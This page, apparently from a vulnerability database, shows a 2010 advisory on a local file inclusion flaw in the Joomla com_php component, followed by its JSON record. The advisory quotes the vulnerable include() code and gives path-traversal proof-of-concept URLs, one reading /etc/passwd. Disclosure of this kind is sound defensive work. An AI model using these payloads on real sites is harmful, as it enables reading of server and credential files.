Search...

Joomla Custom PHP Pages Component com_php LFI Vulnerability

2010-05-13T00:00:00

ID SSV:19601
Type seebug
Reporter Root
Modified 2010-05-13T00:00:00

Description

No description provided by source.

                                        
                                            
                                                Joomla Custom PHP Pages Component LFI Vulnerability
=====================================================
 
- Discovered by : Chip D3 Bi0s
- Email     : chipdebios@gmail.com
- Date          : 2010-05-11
- Where     : From Remote
 
----------------------------------
Affected software description
 
Application : Joomla Custom PHP Pages Component
Developer   : Gabe
Email       : gabe@fijiwebdesign.com
Type        : Non-Commercial
License     : GPL
Date Added  : 6 June 2008
Download    : http://joomla-php.googlecode.com/files/com_php0.1alpha1-J15.tar.gz
 
 
I. BACKGROUND
 
Joomla PHP Pages Component allows you to create simple PHP pages
and link them to the Joomla Menu. This allows you to easily create
a custom page without having to create a whole component. It is
similar to the PHP Module for Joomla, except that it is a full Component.
 
II. DESCRIPTION
 
Some LFI vulnerabilities exist in Joomla Custom PHP Pages Component.
 
 
III. ANALYSIS
 
The bug is in the following files, specifying the lines
 
/components/com_php/php.php
 
[35] $filename = $Params-&gt;get('file', '');
[36] $path = JPATH_ROOT.'/components/com_php/files/'.$filename;
    ...
[47] // evaluate the PHP
[48] echo '&lt;div class=&quot;php_page&quot;&gt;';
[49] if (is_file($path)) {
[50]    include($path);
[51] } else {
[52]    echo '&lt;span class=&quot;note&quot;&gt;Please choose a File&lt;/span&gt;';
 
Explaining the above lines:
According to the code that files are opened, but the code is not
shows no filtration, so we can move into
directories. According to several extensions can be observed as
.html, .jpg, .js, which is not true of all .php
 
 
 
IV. EXPLOITATION
 
http://127.0.0.1/index.php?option=com_php&amp;file=../images/phplogo.jpg
http://127.0.0.1/index.php?option=com_php&amp;file=../js/ie_pngfix.js
http://127.0.0.1/index.php?option=com_php&amp;file=../../../../../../../../../../etc/passwd
 
 
+++++++++++++++++++++++++++++++++++++++
[!] Produced in South America
+++++++++++++++++++++++++++++++++++++++

JSON Vulners Source

Initial Source

{"lastseen": "2017-11-19T18:11:54", "references": [], "enchantments_done": [], "description": "No description provided by source.", "reporter": "Root", "published": "2010-05-13T00:00:00", "type": "seebug", "title": "Joomla Custom PHP Pages Component com_php LFI Vulnerability", "enchantments": {"score": {"value": -0.1, "vector": "NONE", "modified": "2017-11-19T18:11:54", "rev": 2}, "dependencies": {"references": [], "modified": "2017-11-19T18:11:54", "rev": 2}, "vulnersScore": -0.1}, "bulletinFamily": "exploit", "cvelist": [], "modified": "2010-05-13T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-19601", "viewCount": 3, "id": "SSV:19601", "sourceData": "\n Joomla Custom PHP Pages Component LFI Vulnerability\r\n=====================================================\r\n \r\n- Discovered by : Chip D3 Bi0s\r\n- Email : chipdebios@gmail.com\r\n- Date : 2010-05-11\r\n- Where : From Remote\r\n \r\n----------------------------------\r\nAffected software description\r\n \r\nApplication : Joomla Custom PHP Pages Component\r\nDeveloper : Gabe\r\nEmail : gabe@fijiwebdesign.com\r\nType : Non-Commercial\r\nLicense : GPL\r\nDate Added : 6 June 2008\r\nDownload : http://joomla-php.googlecode.com/files/com_php0.1alpha1-J15.tar.gz\r\n \r\n \r\nI. BACKGROUND\r\n \r\nJoomla PHP Pages Component allows you to create simple PHP pages\r\nand link them to the Joomla Menu. This allows you to easily create\r\na custom page without having to create a whole component. It is\r\nsimilar to the PHP Module for Joomla, except that it is a full Component.\r\n \r\nII. DESCRIPTION\r\n \r\nSome LFI vulnerabilities exist in Joomla Custom PHP Pages Component.\r\n \r\n \r\nIII. ANALYSIS\r\n \r\nThe bug is in the following files, specifying the lines\r\n \r\n/components/com_php/php.php\r\n \r\n[35] $filename = $Params->get('file', '');\r\n[36] $path = JPATH_ROOT.'/components/com_php/files/'.$filename;\r\n ...\r\n[47] // evaluate the PHP\r\n[48] echo '<div class="php_page">';\r\n[49] if (is_file($path)) {\r\n[50] include($path);\r\n[51] } else {\r\n[52] echo '<span class="note">Please choose a File</span>';\r\n \r\nExplaining the above lines:\r\nAccording to the code that files are opened, but the code is not\r\nshows no filtration, so we can move into\r\ndirectories. According to several extensions can be observed as\r\n.html, .jpg, .js, which is not true of all .php\r\n \r\n \r\n \r\nIV. EXPLOITATION\r\n \r\nhttp://127.0.0.1/index.php?option=com_php&file=../images/phplogo.jpg\r\nhttp://127.0.0.1/index.php?option=com_php&file=../js/ie_pngfix.js\r\nhttp://127.0.0.1/index.php?option=com_php&file=../../../../../../../../../../etc/passwd\r\n \r\n \r\n+++++++++++++++++++++++++++++++++++++++\r\n[!] Produced in South America\r\n+++++++++++++++++++++++++++++++++++++++\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-19601", "cvss": {"score": 0.0, "vector": "NONE"}, "status": "poc"}